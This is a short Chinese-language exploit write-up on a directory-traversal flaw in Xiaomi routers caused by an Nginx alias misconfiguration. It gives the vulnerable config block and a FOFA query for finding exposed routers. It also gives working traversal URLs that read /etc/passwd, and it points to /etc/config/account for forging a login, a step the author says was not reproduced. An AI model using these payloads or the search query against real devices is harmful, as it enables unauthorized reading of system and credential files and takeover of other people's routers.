01 漏洞产生
小米路由器由于Nginx的配置文件,没有配置好,存在一个目录穿越的漏洞。
在Nginx当中存在该漏洞,配置如下:
location /xxx {
alias /abc/;
}
02 fofa搜索
app=“小米路由器”
03 漏洞利用
如此配置,攻击者可通过
Url:http://ip/xxx…/etc/passwd
来读取到/etc/passwd 文件
而在小米路由器当中的Nginx配置危机为:
location /api-third-party/download/extdisks {
alias /extdisks/;
}
那可以通过
Url:http://ip/api-third-party/download/extdisks…/etc/passwd
来读取到/etc/passwd文件
读取构造包/etc/config/account 构造登录包
后面的构造登录比较难,我也没复现成功